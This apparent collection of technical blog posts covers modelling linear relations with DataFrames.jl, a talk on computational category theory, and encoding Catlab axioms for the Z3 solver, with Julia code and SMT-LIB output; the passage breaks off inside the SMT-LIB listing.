DataFrames.jl Style Linear Relations

DataFrames.jl is a Julia library to store, retrieve and manipulate tabular data. It is the analog of Pandas for python or related tools in R. It implements an interface that is a mish-mash of numpy-like slicing and SQL-like queries and can be used as lightweight flexible relational database. It has proven to be a popular and intuitive interface.

Relational Databases are computer implementations of the mathematical concept of finite relations, but there are other classes of relations. This blog post is about using (abusing?) the DataFrame.jl interface to implement linear relations. Linear relations are useful for describing physical systems whose behavior is constrained by linear equations, such as electrical circuits.

It all comes out quite cute.

Databases and Relations

A finite relation over sets A,B,C,D is a subset of A\times B \times C \times D . In the database, each of these sets corresponds to a column of the database, and each element of the subset corresponds to a row of the database.

Much of the time, we think of storing discrete data in databases, things like names, ids, occupations, ages. However, DataFrame.jl is certainly also capable of storing floats. In this case, the DataFrame could be interpreted as storing a finite number of points in the continuous space R^n , one dimension for each column, one point for each row.

In continuous space, it is desirable to not only describe discrete sets of points, but also blobs. Conceptually, blobs are only a subset of R^n, and are still a mathematical relation. In some sense a blob could be thought of as the contents of a database holding an uncountable number of rows, but then the enumerative storage schemes of an actual physical database doesn’t cut it anymore. We need an extremely compressed storage scheme.

Describing Linear Subspaces

Trying to store arbitrary blobs is a bit too unruly, but if we constrain ourselves to certain classes of blobs, we can still make headway. In this case, we are going to stick to linear blobs, i.e. hyperplanes.

One can concretely describe a hyperplane of R^n by two main representations. First one can list a set of vectors \{v_i \} that span the hyperplane. From this list, we are implicitly describing any linear combination of these vectors v = \sum \lambda_i v_i . A second distinct representation is to list the coefficient vectors \{c_i^T \} of a set of linear equations \{ c_i^T v = 0 \} describing the hyperplane. I will call these the span and constraint representations.

An alternative name for these two representations might be the range and nullspace representation, the generator and equation representation, or by analogy to polyhedral computation, the v-rep and h-rep.

These two representations are dual in some sense. One way in which they feel dual is that adding a new non independent vector to the span increases the dimensionality of the linear subspace by 1. Adding a new independent linear equation to the constraint rep decreases the dimension of the subspace by 1.

It is important to have both representations because different operations on linear subspaces are easy in each. The intersection of two subspaces is easy in the constraint representation. It corresponds to just concatenating two constraint sets. Projection is easy in the span representation where it corresponds to just taking a slice out of each individual generator vector.

As more evidence for the two representation’s duality, two other important operations that are easy in a particular representation are the image and preimage operations under linear maps. The image is easy to compute in the span representation (matrix multiply {Av_i}) and the preimage is easy in the constraint representation (matrix multiply maybe with a transpose thrown in there {c_i^T A}).

The Julia Implementation

The interface of DataFrames still makes sense for linear relations and we can slightly abuse its already existent machinery to make fast headway.

First the constructors of the two representations. As a slight hack, to differentiate between the two representations, I will tag a special blank column to differentiate which representation we are in. Otherwise I forward all arguments to the ordinary DataFrames constructor so you can build these as you would any DataFrame. Each row of the dataframe is either one vector from the span set or one constraint from the constraint set. Column are components of these vectors

using DataFrames
using LinearAlgebra

function DataFrameSpan( x...; kwargs...)
    df = DataFrame(x...; kwargs...)
    df[:spanrep] = 0 # missing
    df
end

# representing linear relations via constraints
function DataFrameCons( x...; kwargs...)
    df = DataFrame(x...; kwargs...)
    df[:consrep] = 0 # missing
    df
end

Because each individual vector in the span obeys the constraint equations, we can numerically convert between them by calling the Julia function nullspace. There is a pleasing symmetry between the two conversion directions.

# nullconvert turns span rep to constraint rep or vice versa
function nullconvert(df)
    cols = names(df)
    A = nullspace(Matrix(df))
    
    DataFrame(mapslices(x->[x], A, dims=2)[:] , cols ) 
end

#https://discourse.julialang.org/t/converting-a-matrix-into-an-array-of-arrays/17038/2


# We tag somewhat inelegantly whether we're inb the span rep or constrain rep via a column tag
isspanrep(x) = "spanrep" ∈ names(x)
isconsrep(x) = "consrep" ∈ names(x)


function spanrep(x) 
    if isspanrep(x)
        return x
    else
        df = select(x, Not(:consrep))
        df = nullconvert(df)
        df[:spanrep] = 0 #add tag
        return df
    end
end

function consrep(x) 
    if isconsrep(x)
        return x
    else
        df = select(x, Not(:spanrep)) #remove tag
        df = nullconvert(df)
        df[:consrep] = 0 #add tag 
        return df
     end
end

The ability to name columns and the analog of the join operation from database gives us a way to compositionally construct systems of linear equations. We also define a projection operations which in some sense solves these equations.

function linearjoin(df,dg)  #should we add makefresh flag?
        df = consrep(df)
        dg = consrep(dg)
        coalesce.(vcat(df,dg, cols=:union), 0)
end


function linearproject(df, cols)
        df = spanrep(df)
        df = df[ [cols ; :spanrep]]
end

And shockingly, that’s about it. A very elegant implementation compared to my previous efforts.

Here as an example we join two resistors in series. We then project out the inner voltage, which returns a relation describing the

resistor(R, i , v1, v2) = DataFrameCons( [i => [R], v1 => [1], v2 => [-1] ] )
vsource(V, v1, v2) =  DataFrameCons( [:one => [V], v1 => [1], v2 => [-1] ] )
isource(I, i) =  DataFrameCons( [:one => [I], i => [-1] ] )

r1 = resistor(10, :i1, :v1, :v2)
r2 = resistor(10, :i1, :v2, :v3)


sys = consrep(linearproject(linearjoin(r1,r2), [:i1, :v1, :v3]) ) 
1×4 DataFrame
│ Row │ i1       │ v1        │ v3         │ consrep │
│     │ Float64  │ Float64   │ Float64    │ Int64   │
├────┼──────────┼───────────┼────────────┼─────────┤
│ 1   │ 0.997509 │ 0.0498755 │ -0.0498755 │ 0       │

This solution is linear proportional to [20,1,-1] hence representing the linear relation of a 20ohm resistor.

For more examples of usage of linear relations, check out these blog posts.

That one could use pandas or Dataframes.jl in this way is something I realized about a year ago when I was writing these posts, but I didn’t realize how pleasantly it would all fall out when I actually sat down to do it.

Bits and Bobbles

  • One often wants not only linear subspaces, but affine subspaces. The convenient and standard trick to convert affine subspaces to linear subspaces is the method of homogenous coordinates. We can increase our linear space with an extra dimension called :one. Whenever we need a scalar occurring in an equation, it now goes in front of this new variable. In the span representation, it is convenient to normalize this entry to 1 by scaling the each span vector. Then the span representation representing the affine subspace is \sum \lambda_i v_i with the constraint that \sum \lambda_i = 1.
  • Linear relations are not the only sensible relations. Other classes of relations that have computational teeth include
  1. Polyhedral relations https://github.com/JuliaPolyhedra/Polyhedra.jl
  2. Polynomial Relations (aka algebraic or semialgebraic relations) https://www.juliahomotopycontinuation.org/
  3. Convex relations https://juliareach.github.io/LazySets.jl/dev/

It seems reasonable that each of these could also use the DataFrames interface as a way of modelling themselves.

  • Linear relations elegantly express operations I would ordinarily phrase in terms of Schur complements, one of my favorite pieces of linear algebra. Projecting a linear relation is finding the effective or reduced system of equations.

In this manner, linear relations are related to Gaussian integrals, which are the canonical example of “integrating out” dynamics in physics. Multidimensional Gaussian integrals are ultimately basically linear algebra engines, giving a way to formulate the Schur complement operation. I think linear relations would form a good core for an “exact” Gaussian integral library.

Quadratic Optimization with linear equality constraints is reducible to a linear relation. I used this for example in my LQR control example above. This is also related to Gaussians, since the method of steepest descent approximates an integration problem by an optimization problem. Gaussian integrals in the presence of linear delta functions \delta(Ax-b) (which are important) convert under the steepest descent method to a quadratic optimization problem with linear equality constraints. All of this is completely ubiquitous in the connection between classical and quantum mechanics, and between statistical and thermodynamics. The Feynman integration over all paths becomes the principle of least action. The partition function integrals become free energy minimizations.

  • In the past, I’ve modeled relations in a Categorical style. This is still I think an excellent internal representation, but perhaps not the best user facing interface.

Query optimization is a big topic in database theory. The ordering of the joins and projections and the chosen points at which to change representations or indices can greatly change the time of the query. It is intriguing that such disparate seeming calculations may benefit from a unified relational query optimizer. I suggest that a categorical IR and the tools of Catlab https://github.com/AlgebraicJulia/Catlab.jl might be a way to do this.

  • Using sparse matrices would be a boon to linear relations (they tend to be very sparse), but we may have to roll our own DataFrame implementation to do so.
  • Should we allow columns to have width? Then variables can represent blocks of the matrix rather than just a single component. It feels like this has nice modelling power. It was also not convenient to do so with the stock DataFrame implementation

I Gave a Talk on “Executing Categories”

I gave a talk for an online discussion group giving a summary of some of the things I’ve posted on this blog. The talk was on some of my experiences and opinions on category theory flavored things programmed for real computers with a focus on calculating answers rather than proving things. It was the Wednesday right after the election, kind of a nerve wracking time.

Rough Outline:

  • Language Choice. Haskell vs Theorem provers vs Python vs Julia
  • Computer functions as categories.
  • Linear operators as a category
  • Automatic differentiation
  • Relations
  • Linear relations
  • Optimization problems as a category

These topics are discussed in much greater detail in blog posts, which are linked in the notes below.

It is very embarrassing to watch oneself in a video, so I haven’t. Edit: ok I did. Here’s a fun game. Do a shot every time I say the word interesting. You’ll get 2 minutes in before you die.

Thanks to Jules Hedges for organizing!

This is the notebook for the talk. It is not entirely compiling or correct code, but more for giving a flavor. You’re probably better off clicking this link, since wordpress embeds notebooks kind of weird. https://github.com/philzook58/cybercat_talk_2020/blob/main/talk.ipynb

Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
view raw cybercat.ipynb hosted with ❤ by GitHub

Theorem Proving For Catlab 2: Let’s Try Z3 This Time. Nope.

Welp, you win some, you lose some.

As I had left off last time, I had realized that my encoding of the equations of Catlab was unsound.

As an example, look at the following suggested axioms.

fof( axiom2, axiom, ![Varf, VarA, VarB]: constcompose(Varf, constid(VarB)) = Varf).
fof( axiom3, axiom, ![Varf, VarA, VarB]: constcompose(constid(VarA), Varf) = Varf).

It is a theorem from these axioms that compose(id(A),id(B)) = id(A) = id(B), which should not be a theorem. Evan made the interesting point that this is the standard proof that shows the identity of a group is unique, so we’re reducing our magnificent category into a pitiful monoid. How sad. And inspecting the trace for some “proofs” returned by eprover shows that the solver was actually using this fact. Oh well.

An approach that I feel more confident in being correct is using “type guards” as preconditions for the equations. In the very useful paper https://people.mpi-inf.mpg.de/~jblanche/mono-trans.pdf this technique is described as well known folklore, albeit in a slightly different context. The type guard is an implication clause that holds the necessary typing predicates from the typing context required for the equation to even make sense. For example composition associativity look like forall A B C D f g h, (type(f) = Hom A B /\ type(g) = Hom B C /\ type(h) = Hom C D /\ type(A) = Ob /\ type(B) = Ob /\ type(C) = Ob /\ type(C) = Ob) => compose(f (g, h)) = compose( compose(f,g),h).

Adding the guards seems to work, but slows the provers to a crawl for fairly trivial queries. My running example is pair(proj1(A,B), proj2(A,B)) = otimes(id(A),id(B)). In Catlab proj1, proj2, and pair, are defined in terms of mcopy and delete, which makes this theorem not as trivial as it would appear. Basically it involves unfolding the definitions, and then applying out of nowhere some identities involving braiding.

I decided to give Z3, an SMT solver, a go since I’m already familiar with it and its python bindings. There are native Julia bindings https://github.com/ahumenberger/Z3.jl which may be useful for a more high performance situation, but they don’t appear to have quantifier support yet.

Julia has the library PyCall https://github.com/JuliaPy/PyCall.jl which was a shear joy to use. I actually could copy and paste some python3 z3 code and run it with very few modifications and I couldn’t imagine going into and out of Julia data types being more seemless.

Z3 does a better job than I expected. I thought thus problem was more appropriate to eprover or vampire, but z3 seemed to consistently out perform them.

At first I tried using a single z3 sort z3.DeclareSort("Gat") , but eventually I switched to a multisorted representation z3.DeclareSort("Ob") and z3.DeclareSort("Hom") as this gets a step closer to accurately representation the types of the GATs in the simply sorted smtlib language. Which of these sorts to use can be determined by looking at the head symbol of the inferred Catlab types. I wrote a custom type inference just so I could try stuff out, but after asking in the zulip, apparently catlab has this built in also.

Some Z3 debugging tips:

I tend to make my z3 programs in python, dump the s.sexpr() in a file and then run that via the z3 command line. It’s easier to fiddle with the smtlib2 file to try out ideas fast. Take stuff out, put stuff in, make simpler questions, etc. Be aware most ideas do not work.

Z3 appears to be inferring pretty bad triggers. The main way z3 handles quantifiers is that it looks for patterns from the quantified expression in the currently known assertion set and instantiates the quantified expression accordingly. Hence I kind of think of quantified expressions as a kind of macro for formulas. This is called E-matching https://rise4fun.com/z3/tutorialcontent/guide#h28. Running z3 with a -v:10 flag let’s you see the triggers. Z3 tries to find very small pieces of expressions that contain the quantified variables. I think we don’t really want any equations instantiated unless it finds either the full right or left hand side + context types. In addition, the triggers inferred for the type inference predicates were not good. We mostly want z3 to run the typing predicate forward, basically as a type inference function. So I tried adding all this and I think it helped, but not enough to actually get my equation to prove. Only simpler problems.


(assert (forall ((A Ob)) (! (= (typo (id A)) (Hom A A)) :pattern ((id A)))))
(assert (forall ((A Ob) (B Ob) (C Ob) (f Hom) (g Hom))
  (! (=> (and (= (typo f) (Hom A B)) (= (typo g) (Hom B C)))
         (= (typo (compose f g)) (Hom A C)))
     :pattern ((compose f g) (Hom A B) (Hom B C)))))
(assert (forall ((A Ob) (B Ob)) (! (= (typo (otimes A B)) Ob) :pattern ((otimes A B)))))
(assert (forall ((A Ob) (B Ob) (C Ob) (D Ob) (f Hom) (g Hom))
  (! (=> (and (= (typo f) (Hom A B)) (= (typo g) (Hom C D)))
         (= (typo (otimes f g)) (Hom (otimes A C) (otimes B D))))
     :pattern ((otimes f g) (Hom A B) (Hom C D)))))
;(assert (forall ((A Ob) (B Ob) (C Ob) (D Ob) (f Hom) (g Hom))
;  (! (=> (and (= (typo f) (Hom A B)) (= (typo g) (Hom C D)))
;         (= (typo (otimes f g)) (Hom (otimes A C) (otimes B D))))
;     :pattern ((= (typo f) (Hom A B)) (= (typo g) (Hom C D))))))
(assert (= (typo munit) Ob))
(assert (forall ((A Ob) (B Ob))
  (! (= (typo (braid A B)) (Hom (otimes A B) (otimes B A)))
     :pattern ((braid A B)))))
(assert (forall ((A Ob))
  (! (= (typo (mcopy A)) (Hom A (otimes A A))) :pattern ((mcopy A)))))
(assert (forall ((A Ob)) (! (= (typo (delete A)) (Hom A munit)) :pattern ((delete A)))))
(assert (forall ((A Ob) (B Ob) (C Ob) (f Hom) (g Hom))
  (! (=> (and (= (typo f) (Hom A B)) (= (typo g) (Hom A C)))
         (= (typo (pair f g)) (Hom A (otimes B C))))
     :pattern ((pair f g) (Hom A B) (Hom A C)))))
(assert (forall ((A Ob) (B Ob))
  (! (= (typo (proj1 A B)) (Hom (otimes A B) A)) :pattern ((proj1 A B)))))
(assert (forall ((A Ob) (B Ob))
  (! (= (typo (proj2 A B)) (Hom (otimes A B) B)) :pattern ((proj2 A B)))))

I tried the axiom profiler to give me any insight. http://people.inf.ethz.ch/summersa/wiki/lib/exe/fetch.php?media=papers:axiomprofiler.pdf https://github.com/viperproject/axiom-profiler I do see some quantifiers that have an insane number of instantiations. This may be because of my multipattern approach of using the Hom type and separately the term as patterns. It will just randomly fire the trigger on Homs unrelated to the one their connected to. That’s awful. The associativity axioms also seem to be triggering too much and that is somewhat expected.

Z3 debugging is similar to prolog debugging since it’s declarative. https://www.metalevel.at/prolog/debugging Take out asserts. Eventually, if you take out enough, an unsat problem should turn sat. That may help you isolate problematic axiom

Another thing I tried was to manually expand out each step of the proof to see where z3 was getting hung up. Most simple step were very fast, but some hung, apparently due to bad triggers? Surprisingly, some things I consider 1 step trivial aren’t quite. Often this is because single equations steps involves associating and absorbing munit in the type predicates. The interchange law was difficult to get to fire for this reason I think.

Trimming the axioms available to only the ones needed really helps, but doesn’t seem practical as an automated thing.

Code

Here’s the Julia code I ended up using to generate the z3 query from the catlab axioms. It’s very hacky. My apologies. I was thrashing.

# here we're trying to use Z3 sorts to take care of some of the typign
using Catlab
using Catlab.Theories
using PyCall
z3 = pyimport("z3")

# my ersatz unnecessary type inference code for Cartesian category terms

function type_infer(x::Symbol; ctx = Dict())
    if x == :Ob
        return :TYPE
    elseif x == :munit
        return :Ob
    else 
        return ctx[x]
    end 
    
end
    
function type_infer(x::Expr; ctx = Dict())
        @assert x.head == :call
        head = x.args[1]
        if head == :compose
            t1 = type_infer(x.args[2], ctx=ctx)
            @assert t1.args[1] == :Hom
            obA = t1.args[2] 
            t2 = type_infer(x.args[3], ctx=ctx)
            @assert t2.args[1] == :Hom
            obC = t2.args[3] 

            if t1.args[3] != t2.args[2]
               #println("HEY CHECK THIS OUT ITS WEIRD")
            #println(t1)
            #println(t2)
        end

            return :(Hom($obA, $obC))
        elseif head == :otimes
            t1 = type_infer(x.args[2], ctx=ctx)
            #@assert t1.args[1] == :Hom
            if t1 isa Symbol && t1 == :Ob
                return :Ob
            end
            @assert t1.args[1] == :Hom
            obA = t1.args[2] 
            obC = t1.args[3] 
            t2 = type_infer(x.args[3], ctx=ctx)
            @assert t2.args[1] == :Hom
            obB = t2.args[2] 
            obD = t2.args[3] 
            return :(Hom(otimes($obA,$obB),otimes($obC, $obD)))
        elseif head == :pair
            t1 = type_infer(x.args[2], ctx=ctx)
            @assert t1.args[1] == :Hom
            obA = t1.args[2] 
            obB = t1.args[3] 
            t2 = type_infer(x.args[3], ctx=ctx)
            @assert t2.args[1] == :Hom
            obC = t2.args[3] 
            @assert t1.args[2] == t2.args[2]
            return :(Hom($obA, otimes($obB,$obC)))
        elseif head == :mcopy
            ob = x.args[2]
            return :(Hom($ob, otimes($ob,$ob)))
        elseif head == :id
            ob = x.args[2]
            return :(Hom($ob, $ob))
        elseif head == :delete
            ob = x.args[2]
            return :(Hom($ob, munit))
        elseif head == :proj1
            obA = x.args[2]
            obB = x.args[3]
            return :(Hom(otimes($obA, $obB), $obA))
        elseif head == :proj2
            obA = x.args[2]
            obB = x.args[3]
            return :(Hom(otimes($obA, $obB), $obB))
        elseif head == :braid
            obA = x.args[2]
            obB = x.args[3]
            return :(Hom(otimes($obA, $obB), otimes($obB, $obA)))
        elseif head == :Hom
            return :TYPE
        elseif head == :munit
            return :Ob
        else
            println(x, ctx)
            @assert false
        end
end

TYPE = z3.DeclareSort("TYPE")

# sortify takes a type expression, grabs the head, and returns the corresponding Z3 sort.
function sortify(ty) 
    if ty isa Symbol
        return z3.DeclareSort(String(ty))
    elseif ty isa Expr
        @assert ty.head == :call
        return z3.DeclareSort(String(ty.args[1]))
    end
end

# z3ify take an Expr or Symbol in a dictionary typing context and returns the z3 equivalent
z3ify( e::Symbol , ctx) = z3.Const(String(e), sortify(type_infer(e,ctx=ctx)))

function z3ify( e::Expr , ctx)
    @assert e.head == :call
    out_sort = sortify(type_infer(e,ctx=ctx))
    z3.Function(e.args[1], [sortify(type_infer(x,ctx=ctx)) for x in e.args[2:end]]..., out_sort)(map(x -> z3ify(x,ctx), e.args[2:end])...)
end

# typo is a helper routine that takes an Expr or Symbol term and returns the Z3 function typo applied to the z3ified term
function typo(x, ctx)
    f = z3.Function("typo" , sortify(type_infer(x,ctx=ctx))  , TYPE ) 
    f(z3ify(x,ctx))
end

# a helper function to z3ify an entire context for the implication
function build_ctx_predicate(ctx)
    map( kv-> begin
        #typo = z3.Function("typo" , sortify(typ)  , TYPE ) 
        typo(kv[1], ctx) == z3ify(kv[2], ctx)
        end
        
        , filter( kv -> kv[2] isa Expr , # we don't need to put typo predicates about simple types like Ob 
             collect(ctx)))

end

# converts the typing axioms of a GAT into the equivalent z3 axioms
# This is quite close to unreadable I think
function build_typo_z3(terms)
    map(myterm ->  begin
                ctx = myterm.context
                conc =  length(myterm.params) > 0  ?  Expr(:call, myterm.name, myterm.params...) : myterm.name
                 preconds = build_ctx_predicate(myterm.context) 
                    if length(myterm.context) > 0 && length(preconds) > 0
                        z3.ForAll( map(x -> z3ify(x,ctx), collect(keys(myterm.context))) ,
                            z3.Implies( z3.And(preconds)  , 
                                     typo(conc,myterm.context) == z3ify(myterm.typ, myterm.context)),
                  patterns = [ z3.MultiPattern(z3ify(conc,ctx),  
                               [ z3ify(x ,ctx ) for x in collect(values(myterm.context)) if x isa Expr]...) # not super sure this is a valid way of filtering generally
                             ],
                  )
                elseif length(myterm.context) > 0
                        z3.ForAll( map(x -> z3ify(x,ctx), collect(keys(myterm.context))) ,
                                     typo(conc,myterm.context) == z3ify(myterm.typ, myterm.context),
                         patterns = [z3ify(conc,ctx)])
                    else
                        typo(conc,myterm.context) == z3ify(myterm.typ, myterm.context)
                    end
            end
              
    , terms)
end

# convert the equations axioms of a GAT into the equivalent z3 terms
function build_eqs_z3(axioms)
        map(axiom -> begin
            @assert axiom.name == :(==)
            ctx = axiom.context
            l = z3ify(axiom.left, axiom.context)
            r = z3ify(axiom.right, axiom.context)
            preconds= build_ctx_predicate(axiom.context) 
            ctx_patterns = [ z3ify(x ,ctx ) for x in collect(values(axiom.context)) if x isa Expr]
            println([z3.MultiPattern( l , ctx_patterns...  ) , z3.MultiPattern( r , ctx_patterns...  ) ])
            if length(axiom.context) > 0 && length(preconds) > 0
                    try
                    z3.ForAll( map(x -> z3ify(x,ctx), collect(keys(axiom.context))) , 
                    z3.Implies(  z3.And( preconds) ,   l == r),
                patterns = [z3.MultiPattern( l , ctx_patterns...  ) , z3.MultiPattern( r , ctx_patterns...  ) ])
                    catch e
                      println(e)
                       z3.ForAll( map(x -> z3ify(x,ctx), collect(keys(axiom.context))) , 
                        z3.Implies(  z3.And( preconds) ,   l == r))
                end
                elseif length(axiom.context) > 0  && length(preconds) == 0
                    z3.ForAll( map(x -> z3ify(x,ctx), collect(keys(axiom.context))) , l == r, patterns = [l,r])
                
                else
                    l == r
                end
            end,
        axioms)
end

# jut trying some stuff out
sortify( :Ob )
sortify( :(Hom(a,b)))
ctx = Dict(:A => :Ob, :B => :Ob)
z3ify(:(id(A)) , ctx)
#=typing_axioms = build_typo_z3(theory(CartesianCategory).terms)
eq_axioms = build_eqs_z3(theory(CartesianCategory).axioms)

s = z3.Solver()
s.add(typing_axioms)
s.add(eq_axioms)
#print(s.sexpr())
=#

inferall(e::Symbol, ctx) = [typo(e,ctx) == z3ify(type_infer(e,ctx=ctx),ctx)]
inferall(e::Expr, ctx) = Iterators.flatten([[typo(e,ctx) == z3ify(type_infer(e,ctx=ctx),ctx)], Iterators.flatten(map(z -> inferall(z,ctx), e.args[2:end]))])


function prove(ctx, l,r; pr = false)
    typing_axioms = build_typo_z3(theory(CartesianCategory).terms)
    eq_axioms = build_eqs_z3(theory(CartesianCategory).axioms)
    s = z3.Solver()
    s.add(typing_axioms)
    s.add(eq_axioms)
    s.add(collect(inferall(l,ctx)))
    s.add(collect(inferall(r,ctx)))
    s.add(z3.Not( z3ify(l,ctx) == z3ify(r,ctx)))
    #println("checking $x")
    #if pr
    println(s.sexpr())
     #else
    #println(s.check())
    #end
end
ctx =  Dict(:A => :Ob, :B => :Ob)
prove( ctx, :(pair(proj1(A,B), proj2(A,B))), :(otimes(id(A),id(B))))

The returned smtlib2 predicate with a (check-sat) manually added at the end

(declare-sort Ob 0)
(declare-sort TYPE 0)
(declare-sort Hom 0)
(declare-fun id (Ob) Hom)
(declare-fun Hom (Ob Ob) TYPE)
(declare-fun typo (Hom) TYPE)
(declare-fun compose (Hom Hom) Hom)
(declare-fun otimes (Ob Ob) Ob)
(declare-fun Ob () TYPE)
(declare-fun typo (Ob) TYPE)
(declare-fun otimes (Hom Hom) Hom)
(declare-fun munit () Ob)
(declare-fun braid (Ob Ob) Hom)
(declare-fun mcopy (Ob) Hom)
(declare-fun delete (Ob) Hom)
(declare-fun pair (Hom Hom) Hom)
(declare-fun proj1 (Ob Ob) Hom)
(declare-fun proj2 (Ob Ob) Hom)
(declare-fun B () Ob)
(declare-fun A () Ob)
(assert (forall ((A Ob)) (! (= (typo (id A)) (Hom A A)) :pattern ((id A)))))
(assert (forall ((A Ob) (B Ob) (C Ob) (f Hom) (g Hom))
  (! (=> (and (= (typo f) (Hom A B)) (= (typo g) (Hom B C)))
         (= (typo (compose f g)) (Hom A C)))
     :pattern ((compose f g) (Hom A B) (Hom B C)))))
(assert (forall ((A Ob) (B Ob)) (! (= (typo (otimes A B)) Ob) :pattern ((otimes A B)))))
(assert (forall ((A Ob) (B Ob) (C Ob) (D Ob) (f Hom) (g Hom))
  (! (=> (and (= (typo f) (Hom A B)) (= (typo g) (Hom C D)))
         (= (typo (otimes f g)) (Hom (otimes A C) (otimes B D))))
     :pattern ((otimes f g) (Hom A B) (Hom C D)))))
(assert (= (typo munit) Ob))
(assert (forall ((A Ob) (B Ob))
  (! (= (typo (braid A B)) (Hom (otimes A B) (otimes B A)))
     :pattern ((braid A B)))))
(assert (forall ((A Ob))
  (! (= (typo (mcopy A)) (Hom A (otimes A A))) :pattern ((mcopy A)))))
(assert (forall ((A Ob)) (! (= (typo (delete A)) (Hom A munit)) :pattern ((delete A)))))
(assert (forall ((A Ob) (B Ob) (C Ob) (f Hom) (g Hom))
  (! (=> (and (= (typo f) (Hom A B)) (= (typo g) (Hom A C)))
         (= (typo (pair f g)) (Hom A (otimes B C))))
     :pattern ((pair f g) (Hom A B) (Hom A C)))))
(assert (forall ((A Ob) (B Ob))
  (! (= (typo (proj1 A B)) (Hom (otimes A B) A)) :pattern ((proj1 A B)))))
(assert (forall ((A Ob) (B Ob))
  (! (= (typo (proj2 A B)) (Hom (otimes A B) B)) :pattern ((proj2 A B)))))
(assert (forall ((A Ob) (B Ob) (C Ob) (D Ob) (f Hom) (g Hom) (h Hom))
  (! (=> (and (= (typo f) (Hom A B))
              (= (typo g) (Hom B C))
              (= (typo h) (Hom C D)))
         (= (compose (compose f g) h) (compose f (compose g h))))
     :pattern ((compose (compose f g) h) (Hom A B) (Hom B C) (Hom C D))
     :pattern ((compose f (compose g h)) (Hom A B) (Hom B C) (Hom C D)))))
(assert (forall ((A Ob) (B Ob) (f Hom))
  (! (=> (and (= (typo f) (Hom A B))) (= (compose f (id B)) f))
     :pattern ((compose f (id B)) (Hom A B))
     :pattern (pattern f (Hom A B)))))
(assert (forall ((A Ob) (B Ob) (f Hom))
  (! (=> (and (= (typo f) (Hom A B))) (= (compose (id A) f) f))
     :pattern ((compose (id A) f) (Hom A B))
     :pattern (pattern f (Hom A B)))))
(assert (forall ((A Ob) (B Ob) (C Ob))
  (! (= (otimes (otimes A B) C) (otimes A (otimes B C)))
     :pattern ((otimes (otimes A B) C))
     :pattern ((otimes A (otimes B C))))))
(assert (forall ((A Ob))
  (! (= (otimes A munit) A) :pattern ((otimes A munit)) :pattern (pattern A))))
(assert (forall ((A Ob))
  (! (= (otimes munit A) A) :pattern ((otimes munit A)) :pattern (pattern A))))
(assert (forall ((A Ob) (B Ob) (C Ob) (X Ob) (Y Ob) (Z Ob) (f Hom) (g Hom) (h Hom))
  (! (=> (and (= (typo f) (Hom A X))
              (= (typo g) (Hom B Y))
              (= (typo h) (Hom C Z)))
         (= (otimes (otimes f g) h) (otimes f (otimes g h))))
     :pattern ((otimes (otimes f g) h) (Hom A X) (Hom B Y) (Hom C Z))
     :pattern ((otimes f (otimes g h)) (Hom A X) (Hom B Y) (Hom C Z)))))
(assert (forall ((A Ob)
         (B Ob)
         (C Ob)
         (X Ob)
         (Y Ob)
         (Z Ob)
         (f Hom)
         (h Hom)
         (g Hom)
         (k Hom))
  (! (=> (and (= (typo f) (Hom A B))
              (= (typo h) (Hom B C))
              (= (typo g) (Hom X Y))
              (= (typo k) (Hom Y Z)))
         (= (compose (otimes f g) (otimes h k))
            (otimes (compose f h) (compose g k))))
     :pattern ((compose (otimes f g) (otimes h k))
               (Hom A B)
               (Hom B C)
               (Hom X Y)
               (Hom Y Z))
     :pattern ((otimes (compose f h) (compose g k))
               (Hom A B)
               (Hom B C)
               (Hom X Y)
               (Hom Y Z)))))
(assert (forall ((A Ob) (B Ob))
  (! (= (id (otimes A B)) (otimes (id A) (id B)))
     :pattern ((id (otimes A B)))
     :pattern ((otimes (id A) (id B))))))
(assert (forall ((A Ob) (B Ob))
  (! (= (compose (braid A B) (braid B A)) (id (otimes A B)))
     :pattern ((compose (braid A B) (braid B A)))
     :pattern ((id (otimes A B))))))
(assert (forall ((A Ob) (B Ob) (C Ob))
  (! (= (braid A (otimes B C))
        (compose (otimes (braid A B) (id C)) (otimes (id B) (braid A C))))
     :pattern ((braid A (otimes B C)))
     :pattern ((compose (otimes (braid A B) (id C)) (otimes (id B) (braid A C)))))))
(assert (forall ((A Ob) (B Ob) (C Ob))
  (! (= (braid (otimes A B) C)
        (compose (otimes (id A) (braid B C)) (otimes (braid A C) (id B))))
     :pattern ((braid (otimes A B) C))
     :pattern ((compose (otimes (id A) (braid B C)) (otimes (braid A C) (id B)))))))
(assert (forall ((A Ob) (B Ob) (C Ob) (D Ob) (f Hom) (g Hom))
  (! (=> (and (= (typo f) (Hom A B)) (= (typo g) (Hom C D)))
         (= (compose (otimes f g) (braid B D))
            (compose (braid A C) (otimes g f))))
     :pattern ((compose (otimes f g) (braid B D)) (Hom A B) (Hom C D))
     :pattern ((compose (braid A C) (otimes g f)) (Hom A B) (Hom C D)))))
(assert (forall ((A Ob))
  (! (= (compose (mcopy A) (otimes (mcopy A) (id A)))
        (compose (mcopy A) (otimes (id A) (mcopy A))))
     :pattern ((compose (mcopy A) (otimes (mcopy A) (id A))))
     :pattern ((compose (mcopy A) (otimes (id A) (mcopy A)))))))
(assert (forall ((A Ob))
  (! (= (compose (mcopy A) (otimes (delete A) (id A))) (id A))
     :pattern ((compose (mcopy A) (otimes (delete A) (id A))))
     :pattern ((id A)))))
(assert (forall ((A Ob))
  (! (= (compose (mcopy A) (otimes (id A) (delete A))) (id A))
     :pattern ((compose (mcopy A) (otimes (id A) (delete A))))
     :pattern ((id A)))))
(assert (forall ((A Ob))
  (! (= (compose (mcopy A) (braid A A)) (mcopy A))
     :pattern ((compose (mcopy A) (braid A A)))
     :pattern ((mcopy A)))))
(assert (forall ((A Ob) (B Ob))
  (! (let ((a!1 (compose (otimes (mcopy A) (mcopy B))
                         (otimes (otimes (id A) (braid A B)) (id B)))))
       (= (mcopy (otimes A B)) a!1))
     :pattern ((mcopy (otimes A B)))
     :pattern ((compose (otimes (mcopy A) (mcopy B))
                        (otimes (otimes (id A) (braid A B)) (id B)))))))
(assert (forall ((A Ob) (B Ob))
  (! (= (delete (otimes A B)) (otimes (delete A) (delete B)))
     :pattern ((delete (otimes A B)))
     :pattern ((otimes (delete A) (delete B))))))
(assert (= (mcopy munit) (id munit)))
(assert (= (delete munit) (id munit)))
(assert (forall ((A Ob) (B Ob) (C Ob) (f Hom) (g Hom))
  (! (=> (and (= (typo f) (Hom C A)) (= (typo g) (Hom C B)))
         (= (pair f g) (compose (mcopy C) (otimes f g))))
     :pattern ((pair f g) (Hom C A) (Hom C B))
